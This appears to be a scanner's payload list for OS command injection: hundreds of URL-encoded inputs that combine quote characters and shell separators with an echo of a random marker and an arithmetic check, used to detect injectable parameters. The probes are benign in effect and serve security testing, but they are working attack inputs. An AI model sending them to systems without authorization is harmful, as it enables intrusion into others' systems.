+os-command-injection,''&echo%20COKQPG$((93%2B87))$(echo%20COKQPG)COKQPG'' +os-command-injection,''|echo%20VQUOCA$((12%2B35))$(echo%20VQUOCA)VQUOCA'' +os-command-injection,''||echo%20QPBCIU$((74%2B42))$(echo%20QPBCIU)QPBCIU'' +os-command-injection,''&&echo%20TWQKFP$((48%2B69))$(echo%20TWQKFP)TWQKFP'' +os-command-injection,''%0aecho%20BTIFJC$((66%2B80))$(echo%20BTIFJC)BTIFJC'' +os-command-injection,''%3Becho%20URYBVY$((71%2B95))$(echo%20URYBVY)URYBVY'' +os-command-injection,''%26echo%20SDBGBI$((27%2B20))$(echo%20SDBGBI)SDBGBI'' +os-command-injection,''%26%26echo%20CMXOJB$((29%2B98))$(echo%20CMXOJB)CMXOJB'' +os-command-injection,''%7Cecho%20CFOPSJ$((27%2B97))$(echo%20CFOPSJ)CFOPSJ'' +os-command-injection,''%7C%7Cecho%20YHTZHZ$((60%2B82))$(echo%20YHTZHZ)YHTZHZ'' +os-command-injection,''echo%20DYFBHG$((50%2B7))$(echo%20DYFBHG)DYFBHG"' +os-command-injection,''%20echo%20JADUEG$((82%2B93))$(echo%20JADUEG)JADUEG"' +os-command-injection,'';echo%20PYWYEX$((88%2B85))$(echo%20PYWYEX)PYWYEX"' +os-command-injection,''&echo%20AGXFEH$((96%2B88))$(echo%20AGXFEH)AGXFEH"' +os-command-injection,''|echo%20CKJBUZ$((1%2B22))$(echo%20CKJBUZ)CKJBUZ"' +os-command-injection,''||echo%20GPBEGV$((20%2B34))$(echo%20GPBEGV)GPBEGV"' +os-command-injection,''&&echo%20BSQSGI$((11%2B44))$(echo%20BSQSGI)BSQSGI"' +os-command-injection,''%0aecho%20SZLYQY$((17%2B3))$(echo%20SZLYQY)SZLYQY"' +os-command-injection,''%3Becho%20MAQCNL$((34%2B31))$(echo%20MAQCNL)MAQCNL"' +os-command-injection,''%26echo%20YBINSK$((62%2B49))$(echo%20YBINSK)YBINSK"' +os-command-injection,''%26%26echo%20YBQKFD$((48%2B31))$(echo%20YBQKFD)YBQKFD"' +os-command-injection,''%7Cecho%20UJMTRL$((89%2B70))$(echo%20UJMTRL)UJMTRL"' +os-command-injection,''%7C%7Cecho%20QSKTXK$((24%2B37))$(echo%20QSKTXK)QSKTXK"' +os-command-injection,''echo%20KOOMPK$((13%2B41))$(echo%20KOOMPK)KOOMPK' +os-command-injection,''%20echo%20MJNNEW$((18%2B53))$(echo%20MJNNEW)MJNNEW' +os-command-injection,'';echo%20HTPOKC$((39%2B32))$(echo%20HTPOKC)HTPOKC' +os-command-injection,''&echo%20CLYXGN$((72%2B81))$(echo%20CLYXGN)CLYXGN' +os-command-injection,''|echo%20CTNHMN$((74%2B58))$(echo%20CTNHMN)CTNHMN' +os-command-injection,''||echo%20TOWNYH$((45%2B79))$(echo%20TOWNYH)TOWNYH' +os-command-injection,''&&echo%20KYOISY$((63%2B3))$(echo%20KYOISY)KYOISY' +os-command-injection,''%0aecho%20EIOCXK$((27%2B80))$(echo%20EIOCXK)EIOCXK' +os-command-injection,''%3Becho%20LMKOMS$((85%2B51))$(echo%20LMKOMS)LMKOMS' +os-command-injection,''%26echo%20XIZQEH$((78%2B28))$(echo%20XIZQEH)XIZQEH' +os-command-injection,''%26%26echo%20AKFLIE$((27%2B64))$(echo%20AKFLIE)AKFLIE' +os-command-injection,''%7Cecho%20TOTSLG$((60%2B1))$(echo%20TOTSLG)TOTSLG' +os-command-injection,''%7C%7Cecho%20DVAMSG$((74%2B5))$(echo%20DVAMSG)DVAMSG' +os-command-injection,''echo%20GGRVQX$((86%2B56))$(echo%20GGRVQX)GGRVQX//' +os-command-injection,''%20echo%20WWHRDZ$((5%2B86))$(echo%20WWHRDZ)WWHRDZ//' +os-command-injection,'';echo%20YDSNXZ$((29%2B43))$(echo%20YDSNXZ)YDSNXZ//' +os-command-injection,''&echo%20BRXZKX$((10%2B84))$(echo%20BRXZKX)BRXZKX//' +os-command-injection,''|echo%20ZMCCDQ$((18%2B56))$(echo%20ZMCCDQ)ZMCCDQ//' +os-command-injection,''||echo%20XNZLSA$((34%2B75))$(echo%20XNZLSA)XNZLSA//' +os-command-injection,''&&echo%20SKRKXO$((18%2B5))$(echo%20SKRKXO)SKRKXO//' +os-command-injection,''%0aecho%20WIRUWF$((87%2B88))$(echo%20WIRUWF)WIRUWF//' +os-command-injection,''%3Becho%20LIHHVF$((18%2B45))$(echo%20LIHHVF)LIHHVF//' +os-command-injection,''%26echo%20VDQUYJ$((41%2B46))$(echo%20VDQUYJ)VDQUYJ//' +os-command-injection,''%26%26echo%20EKWZHX$((96%2B4))$(echo%20EKWZHX)EKWZHX//' +os-command-injection,''%7Cecho%20LLJKNH$((3%2B88))$(echo%20LLJKNH)LLJKNH//' +os-command-injection,''%7C%7Cecho%20CNSLVN$((6%2B10))$(echo%20CNSLVN)CNSLVN//' +os-command-injection,''echo%20UVXCGD$((51%2B43))$(echo%20UVXCGD)UVXCGD\' +os-command-injection,''%20echo%20BYBKHF$((87%2B41))$(echo%20BYBKHF)BYBKHF\' +os-command-injection,'';echo%20ACEKKI$((66%2B70))$(echo%20ACEKKI)ACEKKI\' +os-command-injection,''&echo%20WHEUEX$((35%2B4))$(echo%20WHEUEX)WHEUEX\' +os-command-injection,''|echo%20LTTDYL$((1%2B42))$(echo%20LTTDYL)LTTDYL\' +os-command-injection,''||echo%20VAYJRW$((6%2B1))$(echo%20VAYJRW)VAYJRW\' +os-command-injection,''&&echo%20WZZOUT$((83%2B36))$(echo%20WZZOUT)WZZOUT\' +os-command-injection,''%0aecho%20BMHVJK$((19%2B30))$(echo%20BMHVJK)BMHVJK\' +os-command-injection,''%3Becho%20HQBNCX$((10%2B83))$(echo%20HQBNCX)HQBNCX\' +os-command-injection,''%26echo%20BRROSL$((24%2B11))$(echo%20BRROSL)BRROSL\' +os-command-injection,''%26%26echo%20IKUKJX$((80%2B89))$(echo%20IKUKJX)IKUKJX\' +os-command-injection,''%7Cecho%20KAJAPA$((75%2B48))$(echo%20KAJAPA)KAJAPA\' +os-command-injection,''%7C%7Cecho%20JJSSJL$((99%2B38))$(echo%20JJSSJL)JJSSJL\' +os-command-injection,''echo%20QQEHPP$((69%2B2))$(echo%20QQEHPP)QQEHPP&' +os-command-injection,''%20echo%20JFTFZW$((33%2B39))$(echo%20JFTFZW)JFTFZW&' +os-command-injection,'';echo%20PYZNPF$((23%2B64))$(echo%20PYZNPF)PYZNPF&' +os-command-injection,''&echo%20XYOEXK$((74%2B11))$(echo%20XYOEXK)XYOEXK&' +os-command-injection,''|echo%20YCIXVI$((40%2B81))$(echo%20YCIXVI)YCIXVI&' +os-command-injection,''||echo%20GERZZX$((98%2B84))$(echo%20GERZZX)GERZZX&' +os-command-injection,''&&echo%20HVTWDK$((44%2B47))$(echo%20HVTWDK)HVTWDK&' +os-command-injection,''%0aecho%20MGXPRT$((51%2B4))$(echo%20MGXPRT)MGXPRT&' +os-command-injection,''%3Becho%20UFYCCQ$((51%2B2))$(echo%20UFYCCQ)UFYCCQ&' +os-command-injection,''%26echo%20JUIBAU$((1%2B74))$(echo%20JUIBAU)JUIBAU&' +os-command-injection,''%26%26echo%20BMIIJQ$((29%2B3))$(echo%20BMIIJQ)BMIIJQ&' +os-command-injection,''%7Cecho%20ZPVFOX$((81%2B22))$(echo%20ZPVFOX)ZPVFOX&' +os-command-injection,''%7C%7Cecho%20SLVMKV$((96%2B0))$(echo%20SLVMKV)SLVMKV&' +os-command-injection,''echo%20HBTLLE$((1%2B32))$(echo%20HBTLLE)HBTLLE|' +os-command-injection,''%20echo%20HNOLCQ$((85%2B27))$(echo%20HNOLCQ)HNOLCQ|' +os-command-injection,'';echo%20CCXTNP$((57%2B74))$(echo%20CCXTNP)CCXTNP|' +os-command-injection,''&echo%20ELYXQO$((59%2B10))$(echo%20ELYXQO)ELYXQO|' +os-command-injection,''|echo%20NUZDZT$((76%2B71))$(echo%20NUZDZT)NUZDZT|' +os-command-injection,''||echo%20LAPJJF$((87%2B11))$(echo%20LAPJJF)LAPJJF|' +os-command-injection,''&&echo%20TWKYHE$((0%2B57))$(echo%20TWKYHE)TWKYHE|' +os-command-injection,''%0aecho%20MAOXEM$((48%2B53))$(echo%20MAOXEM)MAOXEM|' +os-command-injection,''%3Becho%20QGKSLY$((79%2B94))$(echo%20QGKSLY)QGKSLY|' +os-command-injection,''%26echo%20UCANNA$((30%2B68))$(echo%20UCANNA)UCANNA|' +os-command-injection,''%26%26echo%20ZWVYHU$((11%2B21))$(echo%20ZWVYHU)ZWVYHU|' +os-command-injection,''%7Cecho%20DPUJIL$((23%2B45))$(echo%20DPUJIL)DPUJIL|' +os-command-injection,''%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY|' +os-command-injection,''echo%20ZKEZHZ$((79%2B67))$(echo%20ZKEZHZ)ZKEZHZ%27' +os-command-injection,''%20echo%20DCFSTX$((93%2B73))$(echo%20DCFSTX)DCFSTX%27' +os-command-injection,'';echo%20HPSGQK$((19%2B98))$(echo%20HPSGQK)HPSGQK%27' +os-command-injection,''&echo%20LTTPNV$((10%2B90))$(echo%20LTTPNV)LTTPNV%27' +os-command-injection,''|echo%20RAKMKS$((5%2B89))$(echo%20RAKMKS)RAKMKS%27' +os-command-injection,''||echo%20SGXVWY$((48%2B78))$(echo%20SGXVWY)SGXVWY%27' +os-command-injection,''&&echo%20XOCEJG$((66%2B21))$(echo%20XOCEJG)XOCEJG%27' +os-command-injection,''%0aecho%20PPSKOS$((66%2B51))$(echo%20PPSKOS)PPSKOS%27' +os-command-injection,''%3Becho%20HKYEGB$((78%2B19))$(echo%20HKYEGB)HKYEGB%27' +os-command-injection,''%26echo%20YRIYND$((40%2B81))$(echo%20YRIYND)YRIYND%27' +os-command-injection,''%26%26echo%20SWZBKK$((94%2B84))$(echo%20SWZBKK)SWZBKK%27' +os-command-injection,''%7Cecho%20KIELDL$((12%2B2))$(echo%20KIELDL)KIELDL%27' +os-command-injection,''%7C%7Cecho%20AXSULH$((48%2B60))$(echo%20AXSULH)AXSULH%27' +os-command-injection,''echo%20WIBNDS$((23%2B85))$(echo%20WIBNDS)WIBNDS%22' +os-command-injection,''%20echo%20HBUFGZ$((85%2B26))$(echo%20HBUFGZ)HBUFGZ%22' +os-command-injection,'';echo%20RHFTCS$((28%2B7))$(echo%20RHFTCS)RHFTCS%22' +os-command-injection,''&echo%20RJCCAT$((53%2B34))$(echo%20RJCCAT)RJCCAT%22' +os-command-injection,''|echo%20UTCPPJ$((1%2B15))$(echo%20UTCPPJ)UTCPPJ%22' +os-command-injection,''||echo%20DNOHYC$((47%2B59))$(echo%20DNOHYC)DNOHYC%22' +os-command-injection,''&&echo%20SXUJKT$((94%2B38))$(echo%20SXUJKT)SXUJKT%22' +os-command-injection,''%0aecho%20GGGPWE$((90%2B87))$(echo%20GGGPWE)GGGPWE%22' +os-command-injection,''%3Becho%20WIJQLD$((58%2B39))$(echo%20WIJQLD)WIJQLD%22' +os-command-injection,''%26echo%20PXNVTZ$((92%2B1))$(echo%20PXNVTZ)PXNVTZ%22' +os-command-injection,''%26%26echo%20DDHYJG$((44%2B11))$(echo%20DDHYJG)DDHYJG%22' +os-command-injection,''%7Cecho%20WUSBMH$((6%2B46))$(echo%20WUSBMH)WUSBMH%22' +os-command-injection,''%7C%7Cecho%20ZJAXER$((49%2B60))$(echo%20ZJAXER)ZJAXER%22' +os-command-injection,''echo%20GZXGVN$((4%2B70))$(echo%20GZXGVN)GZXGVN%5C%5C' +os-command-injection,''%20echo%20UXKTUC$((59%2B25))$(echo%20UXKTUC)UXKTUC%5C%5C' +os-command-injection,'';echo%20KKGOUA$((23%2B96))$(echo%20KKGOUA)KKGOUA%5C%5C' +os-command-injection,''&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C' +os-command-injection,''|echo%20LRGWPW$((14%2B39))$(echo%20LRGWPW)LRGWPW%5C%5C' +os-command-injection,''||echo%20ANRNDB$((81%2B57))$(echo%20ANRNDB)ANRNDB%5C%5C' +os-command-injection,''&&echo%20XWGNWJ$((33%2B16))$(echo%20XWGNWJ)XWGNWJ%5C%5C' +os-command-injection,''%0aecho%20IMHMUF$((78%2B85))$(echo%20IMHMUF)IMHMUF%5C%5C' +os-command-injection,''%3Becho%20JPRQKB$((93%2B89))$(echo%20JPRQKB)JPRQKB%5C%5C' +os-command-injection,''%26echo%20NKMKNI$((64%2B82))$(echo%20NKMKNI)NKMKNI%5C%5C' +os-command-injection,''%26%26echo%20PMWJRH$((60%2B59))$(echo%20PMWJRH)PMWJRH%5C%5C' +os-command-injection,''%7Cecho%20RHSIRJ$((85%2B6))$(echo%20RHSIRJ)RHSIRJ%5C%5C' +os-command-injection,''%7C%7Cecho%20NEBEJR$((3%2B38))$(echo%20NEBEJR)NEBEJR%5C%5C' +os-command-injection,''echo%20OLRHZX$((22%2B72))$(echo%20OLRHZX)OLRHZX%2F%2F' +os-command-injection,''%20echo%20PPRCPS$((95%2B69))$(echo%20PPRCPS)PPRCPS%2F%2F' +os-command-injection,'';echo%20ICITTS$((63%2B83))$(echo%20ICITTS)ICITTS%2F%2F' +os-command-injection,''&echo%20FXSADU$((58%2B85))$(echo%20FXSADU)FXSADU%2F%2F' +os-command-injection,''|echo%20NINPLO$((85%2B22))$(echo%20NINPLO)NINPLO%2F%2F' +os-command-injection,''||echo%20UAPCZM$((19%2B50))$(echo%20UAPCZM)UAPCZM%2F%2F' +os-command-injection,''&&echo%20JGTGES$((48%2B34))$(echo%20JGTGES)JGTGES%2F%2F' +os-command-injection,''%0aecho%20QVUNCP$((53%2B11))$(echo%20QVUNCP)QVUNCP%2F%2F' +os-command-injection,''%3Becho%20GHQCJV$((24%2B65))$(echo%20GHQCJV)GHQCJV%2F%2F' +os-command-injection,''%26echo%20ZXUJMM$((66%2B53))$(echo%20ZXUJMM)ZXUJMM%2F%2F' +os-command-injection,''%26%26echo%20UWWBJC$((28%2B91))$(echo%20UWWBJC)UWWBJC%2F%2F' +os-command-injection,''%7Cecho%20ZGANEQ$((95%2B91))$(echo%20ZGANEQ)ZGANEQ%2F%2F' +os-command-injection,''%7C%7Cecho%20WVNPRW$((44%2B23))$(echo%20WVNPRW)WVNPRW%2F%2F' +os-command-injection,''echo%20ZQODFO$((38%2B30))$(echo%20ZQODFO)ZQODFO%26' +os-command-injection,''%20echo%20VBRTZG$((57%2B99))$(echo%20VBRTZG)VBRTZG%26' +os-command-injection,'';echo%20EDEYQK$((45%2B89))$(echo%20EDEYQK)EDEYQK%26' +os-command-injection,''&echo%20HUEWVL$((15%2B9))$(echo%20HUEWVL)HUEWVL%26' +os-command-injection,''|echo%20FWJJDN$((64%2B27))$(echo%20FWJJDN)FWJJDN%26' +os-command-injection,''||echo%20DJIUPG$((86%2B80))$(echo%20DJIUPG)DJIUPG%26' +os-command-injection,''&&echo%20LQMLDZ$((74%2B43))$(echo%20LQMLDZ)LQMLDZ%26' +os-command-injection,''%0aecho%20VECHDM$((44%2B40))$(echo%20VECHDM)VECHDM%26' +os-command-injection,''%3Becho%20ZPQVVV$((58%2B25))$(echo%20ZPQVVV)ZPQVVV%26' +os-command-injection,''%26echo%20IECZZA$((76%2B1))$(echo%20IECZZA)IECZZA%26' +os-command-injection,''%26%26echo%20WRWTAS$((61%2B67))$(echo%20WRWTAS)WRWTAS%26' +os-command-injection,''%7Cecho%20VBTZIY$((45%2B53))$(echo%20VBTZIY)VBTZIY%26' +os-command-injection,''%7C%7Cecho%20QOWWZU$((31%2B94))$(echo%20QOWWZU)QOWWZU%26' +os-command-injection,''echo%20NIXAXB$((47%2B23))$(echo%20NIXAXB)NIXAXB%7C' +os-command-injection,''%20echo%20MIVIHV$((7%2B58))$(echo%20MIVIHV)MIVIHV%7C' +os-command-injection,'';echo%20CYLOAT$((50%2B30))$(echo%20CYLOAT)CYLOAT%7C' +os-command-injection,''&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C' +os-command-injection,''|echo%20DTSQRM$((82%2B33))$(echo%20DTSQRM)DTSQRM%7C' +os-command-injection,''||echo%20SPFQXR$((54%2B70))$(echo%20SPFQXR)SPFQXR%7C' +os-command-injection,''&&echo%20TQZUUM$((43%2B5))$(echo%20TQZUUM)TQZUUM%7C' +os-command-injection,''%0aecho%20LRJXVV$((74%2B11))$(echo%20LRJXVV)LRJXVV%7C' +os-command-injection,''%3Becho%20QGYQUP$((35%2B73))$(echo%20QGYQUP)QGYQUP%7C' +os-command-injection,''%26echo%20SYNXTK$((0%2B99))$(echo%20SYNXTK)SYNXTK%7C' +os-command-injection,''%26%26echo%20MIQKPQ$((80%2B18))$(echo%20MIQKPQ)MIQKPQ%7C' +os-command-injection,''%7Cecho%20HKFPKH$((65%2B16))$(echo%20HKFPKH)HKFPKH%7C' +os-command-injection,''%7C%7Cecho%20FUFIPG$((27%2B62))$(echo%20FUFIPG)FUFIPG%7C' +os-command-injection,'"echo%20UFAGYK$((82%2B39))$(echo%20UFAGYK)UFAGYK' +os-command-injection,'"%20echo%20IXTSZA$((19%2B14))$(echo%20IXTSZA)IXTSZA' +os-command-injection,'";echo%20BJMUOS$((51%2B32))$(echo%20BJMUOS)BJMUOS' +os-command-injection,'"&echo%20CYVXHL$((2%2B25))$(echo%20CYVXHL)CYVXHL' +os-command-injection,'"|echo%20JFFFCK$((98%2B39))$(echo%20JFFFCK)JFFFCK' +os-command-injection,'"||echo%20JZKWAX$((82%2B62))$(echo%20JZKWAX)JZKWAX' +os-command-injection,'"&&echo%20PFNZYT$((53%2B30))$(echo%20PFNZYT)PFNZYT' +os-command-injection,'"%0aecho%20CJDAVC$((37%2B56))$(echo%20CJDAVC)CJDAVC' +os-command-injection,'"%3Becho%20XKMIXJ$((55%2B55))$(echo%20XKMIXJ)XKMIXJ' +os-command-injection,'"%26echo%20XPABSL$((91%2B48))$(echo%20XPABSL)XPABSL' +os-command-injection,'"%26%26echo%20MSODXX$((98%2B77))$(echo%20MSODXX)MSODXX' +os-command-injection,'"%7Cecho%20NIUSSD$((14%2B80))$(echo%20NIUSSD)NIUSSD' +os-command-injection,'"%7C%7Cecho%20ZXHQBT$((34%2B29))$(echo%20ZXHQBT)ZXHQBT' +os-command-injection,'"echo%20LROQVJ$((59%2B51))$(echo%20LROQVJ)LROQVJ'' +os-command-injection,'"%20echo%20AWPUDF$((45%2B83))$(echo%20AWPUDF)AWPUDF'' +os-command-injection,'";echo%20DHCQNM$((60%2B94))$(echo%20DHCQNM)DHCQNM'' +os-command-injection,'"&echo%20AMSBLU$((47%2B94))$(echo%20AMSBLU)AMSBLU'' +os-command-injection,'"|echo%20DKGJRP$((17%2B97))$(echo%20DKGJRP)DKGJRP'' +os-command-injection,'"||echo%20TABSEM$((52%2B6))$(echo%20TABSEM)TABSEM'' +os-command-injection,'"&&echo%20YPKEUZ$((26%2B62))$(echo%20YPKEUZ)YPKEUZ'' +os-command-injection,'"%0aecho%20UIFJEM$((39%2B5))$(echo%20UIFJEM)UIFJEM'' +os-command-injection,'"%3Becho%20RBDSUF$((59%2B65))$(echo%20RBDSUF)RBDSUF'' +os-command-injection,'"%26echo%20HKWALZ$((5%2B31))$(echo%20HKWALZ)HKWALZ'' +os-command-injection,'"%26%26echo%20XHYRUC$((45%2B24))$(echo%20XHYRUC)XHYRUC'' +os-command-injection,'"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR'' +os-command-injection,'"%7C%7Cecho%20BOMIAP$((85%2B40))$(echo%20BOMIAP)BOMIAP'' +os-command-injection,'"echo%20UEUAGM$((11%2B22))$(echo%20UEUAGM)UEUAGM"' +os-command-injection,'"%20echo%20IWYYYV$((59%2B47))$(echo%20IWYYYV)IWYYYV"' +os-command-injection,'";echo%20NUURLG$((10%2B93))$(echo%20NUURLG)NUURLG"' +os-command-injection,'"&echo%20DTXNAY$((11%2B40))$(echo%20DTXNAY)DTXNAY"' +os-command-injection,'"|echo%20UPRLNQ$((23%2B4))$(echo%20UPRLNQ)UPRLNQ"' +os-command-injection,'"||echo%20VKPFAP$((92%2B94))$(echo%20VKPFAP)VKPFAP"' +os-command-injection,'"&&echo%20KWPRCS$((3%2B21))$(echo%20KWPRCS)KWPRCS"' +os-command-injection,'"%0aecho%20MJVQYB$((44%2B28))$(echo%20MJVQYB)MJVQYB"' +os-command-injection,'"%3Becho%20TMWMCT$((51%2B35))$(echo%20TMWMCT)TMWMCT"' +os-command-injection,'"%26echo%20HCCVWB$((30%2B94))$(echo%20HCCVWB)HCCVWB"' +os-command-injection,'"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM"' +os-command-injection,'"%7Cecho%20FCZDSM$((68%2B91))$(echo%20FCZDSM)FCZDSM"' +os-command-injection,'"%7C%7Cecho%20HTPEMJ$((2%2B19))$(echo%20HTPEMJ)HTPEMJ"' +os-command-injection,'"echo%20OQTVEH$((73%2B9))$(echo%20OQTVEH)OQTVEH' +os-command-injection,'"%20echo%20QIOHVO$((71%2B18))$(echo%20QIOHVO)QIOHVO' +os-command-injection,'";echo%20HIENCF$((0%2B66))$(echo%20HIENCF)HIENCF' +os-command-injection,'"&echo%20IBIYQC$((4%2B38))$(echo%20IBIYQC)IBIYQC' +os-command-injection,'"|echo%20FOBRPZ$((91%2B99))$(echo%20FOBRPZ)FOBRPZ' +os-command-injection,'"||echo%20KVIAFY$((17%2B57))$(echo%20KVIAFY)KVIAFY' +os-command-injection,'"&&echo%20IQZTQY$((96%2B36))$(echo%20IQZTQY)IQZTQY' +os-command-injection,'"%0aecho%20PNFTTQ$((20%2B65))$(echo%20PNFTTQ)PNFTTQ' +os-command-injection,'"%3Becho%20PDMNTI$((23%2B51))$(echo%20PDMNTI)PDMNTI' +os-command-injection,'"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP' +os-command-injection,'"%26%26echo%20IJQIDW$((5%2B53))$(echo%20IJQIDW)IJQIDW' +os-command-injection,'"%7Cecho%20ZIYCEF$((9%2B56))$(echo%20ZIYCEF)ZIYCEF' +os-command-injection,'"%7C%7Cecho%20OMOFYD$((86%2B53))$(echo%20OMOFYD)OMOFYD' +os-command-injection,'"echo%20SRQCVS$((48%2B38))$(echo%20SRQCVS)SRQCVS//' +os-command-injection,'"%20echo%20BYNNOQ$((5%2B9))$(echo%20BYNNOQ)BYNNOQ//' +os-command-injection,'";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB//' +os-command-injection,'"&echo%20QZCVQA$((19%2B81))$(echo%20QZCVQA)QZCVQA//' +os-command-injection,'"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH//' +os-command-injection,'"||echo%20GIRCRN$((15%2B16))$(echo%20GIRCRN)GIRCRN//' +os-command-injection,'"&&echo%20KXEBPS$((55%2B92))$(echo%20KXEBPS)KXEBPS//' +os-command-injection,'"%0aecho%20JCEFAY$((97%2B37))$(echo%20JCEFAY)JCEFAY//' +os-command-injection,'"%3Becho%20MDSQTA$((24%2B10))$(echo%20MDSQTA)MDSQTA//' +os-command-injection,'"%26echo%20AIKVYL$((27%2B44))$(echo%20AIKVYL)AIKVYL//' +os-command-injection,'"%26%26echo%20YUQTKP$((71%2B23))$(echo%20YUQTKP)YUQTKP//' +os-command-injection,'"%7Cecho%20GPGSXE$((20%2B85))$(echo%20GPGSXE)GPGSXE//' +os-command-injection,'"%7C%7Cecho%20JDTYJX$((18%2B24))$(echo%20JDTYJX)JDTYJX//' +os-command-injection,'"echo%20UWNJQE$((91%2B46))$(echo%20UWNJQE)UWNJQE\' +os-command-injection,'"%20echo%20TZZNSL$((92%2B66))$(echo%20TZZNSL)TZZNSL\' +os-command-injection,'";echo%20IJTGYU$((36%2B47))$(echo%20IJTGYU)IJTGYU\' +os-command-injection,'"&echo%20TRMPTD$((48%2B23))$(echo%20TRMPTD)TRMPTD\' +os-command-injection,'"|echo%20EEOGHF$((87%2B30))$(echo%20EEOGHF)EEOGHF\' +os-command-injection,'"||echo%20EXJSNR$((49%2B13))$(echo%20EXJSNR)EXJSNR\' +os-command-injection,'"&&echo%20PMIRHD$((95%2B94))$(echo%20PMIRHD)PMIRHD\' +os-command-injection,'"%0aecho%20PZDPMF$((67%2B92))$(echo%20PZDPMF)PZDPMF\' +os-command-injection,'"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\' +os-command-injection,'"%26echo%20MBGKIN$((22%2B60))$(echo%20MBGKIN)MBGKIN\' +os-command-injection,'"%26%26echo%20FGFIOR$((55%2B25))$(echo%20FGFIOR)FGFIOR\' +os-command-injection,'"%7Cecho%20XTLLDX$((25%2B20))$(echo%20XTLLDX)XTLLDX\' +os-command-injection,'"%7C%7Cecho%20HKHVFC$((85%2B7))$(echo%20HKHVFC)HKHVFC\' +os-command-injection,'"echo%20TPIIXD$((67%2B79))$(echo%20TPIIXD)TPIIXD&' +os-command-injection,'"%20echo%20FEKBSB$((80%2B66))$(echo%20FEKBSB)FEKBSB&' +os-command-injection,'";echo%20DNJXZB$((38%2B82))$(echo%20DNJXZB)DNJXZB&' +os-command-injection,'"&echo%20JNXUVW$((81%2B20))$(echo%20JNXUVW)JNXUVW&' +os-command-injection,'"|echo%20BKRUJQ$((5%2B96))$(echo%20BKRUJQ)BKRUJQ&' +os-command-injection,'"||echo%20TNFYTM$((72%2B96))$(echo%20TNFYTM)TNFYTM&' +os-command-injection,'"&&echo%20AEAXJF$((73%2B78))$(echo%20AEAXJF)AEAXJF&' +os-command-injection,'"%0aecho%20DDWDPN$((91%2B29))$(echo%20DDWDPN)DDWDPN&' +os-command-injection,'"%3Becho%20UZGZPC$((74%2B69))$(echo%20UZGZPC)UZGZPC&' +os-command-injection,'"%26echo%20CXIGLR$((26%2B78))$(echo%20CXIGLR)CXIGLR&' +os-command-injection,'"%26%26echo%20EXRBWP$((2%2B65))$(echo%20EXRBWP)EXRBWP&' +os-command-injection,'"%7Cecho%20ZOFKJO$((5%2B82))$(echo%20ZOFKJO)ZOFKJO&' +os-command-injection,'"%7C%7Cecho%20CTTIVX$((65%2B14))$(echo%20CTTIVX)CTTIVX&' +os-command-injection,'"echo%20NMPYVC$((95%2B49))$(echo%20NMPYVC)NMPYVC|' +os-command-injection,'"%20echo%20CTFTCJ$((80%2B91))$(echo%20CTFTCJ)CTFTCJ|' +os-command-injection,'";echo%20QBISFH$((85%2B18))$(echo%20QBISFH)QBISFH|' +os-command-injection,'"&echo%20CCWSNS$((52%2B72))$(echo%20CCWSNS)CCWSNS|' +os-command-injection,'"|echo%20IIWZTV$((37%2B92))$(echo%20IIWZTV)IIWZTV|' +os-command-injection,'"||echo%20DKOIIU$((52%2B39))$(echo%20DKOIIU)DKOIIU|' +os-command-injection,'"&&echo%20ELGGDQ$((2%2B5))$(echo%20ELGGDQ)ELGGDQ|' +os-command-injection,'"%0aecho%20QBFOYY$((28%2B31))$(echo%20QBFOYY)QBFOYY|' +os-command-injection,'"%3Becho%20QATQCM$((57%2B7))$(echo%20QATQCM)QATQCM|' +os-command-injection,'"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF|' +os-command-injection,'"%26%26echo%20DBNQDD$((96%2B50))$(echo%20DBNQDD)DBNQDD|' +os-command-injection,'"%7Cecho%20BAERUM$((15%2B78))$(echo%20BAERUM)BAERUM|' +os-command-injection,'"%7C%7Cecho%20FFARMZ$((95%2B61))$(echo%20FFARMZ)FFARMZ|' +os-command-injection,'"echo%20MJEJVE$((54%2B9))$(echo%20MJEJVE)MJEJVE%27' +os-command-injection,'"%20echo%20LRNMXI$((82%2B72))$(echo%20LRNMXI)LRNMXI%27' +os-command-injection,'";echo%20QNIOIG$((45%2B76))$(echo%20QNIOIG)QNIOIG%27' +os-command-injection,'"&echo%20TFMDGN$((33%2B82))$(echo%20TFMDGN)TFMDGN%27' +os-command-injection,'"|echo%20CCTRQP$((48%2B16))$(echo%20CCTRQP)CCTRQP%27' +os-command-injection,'"||echo%20SAHVEF$((53%2B99))$(echo%20SAHVEF)SAHVEF%27' +os-command-injection,'"&&echo%20SKQWDW$((71%2B38))$(echo%20SKQWDW)SKQWDW%27' +os-command-injection,'"%0aecho%20LFVTXU$((70%2B65))$(echo%20LFVTXU)LFVTXU%27' +os-command-injection,'"%3Becho%20KRGULU$((96%2B71))$(echo%20KRGULU)KRGULU%27' +os-command-injection,'"%26echo%20WHBQCR$((5%2B15))$(echo%20WHBQCR)WHBQCR%27' +os-command-injection,'"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27' +os-command-injection,'"%7Cecho%20NGISBI$((50%2B27))$(echo%20NGISBI)NGISBI%27' +os-command-injection,'"%7C%7Cecho%20OESDWI$((60%2B61))$(echo%20OESDWI)OESDWI%27' +os-command-injection,'"echo%20XFGDCC$((53%2B64))$(echo%20XFGDCC)XFGDCC%22' +os-command-injection,'"%20echo%20BZQFLS$((30%2B41))$(echo%20BZQFLS)BZQFLS%22' +os-command-injection,'";echo%20KGVZYK$((88%2B50))$(echo%20KGVZYK)KGVZYK%22' +os-command-injection,'"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22' +os-command-injection,'"|echo%20LYYMLJ$((68%2B90))$(echo%20LYYMLJ)LYYMLJ%22' +os-command-injection,'"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22' +os-command-injection,'"&&echo%20IWMDND$((49%2B2))$(echo%20IWMDND)IWMDND%22' +os-command-injection,'"%0aecho%20ZRDUWP$((33%2B75))$(echo%20ZRDUWP)ZRDUWP%22' 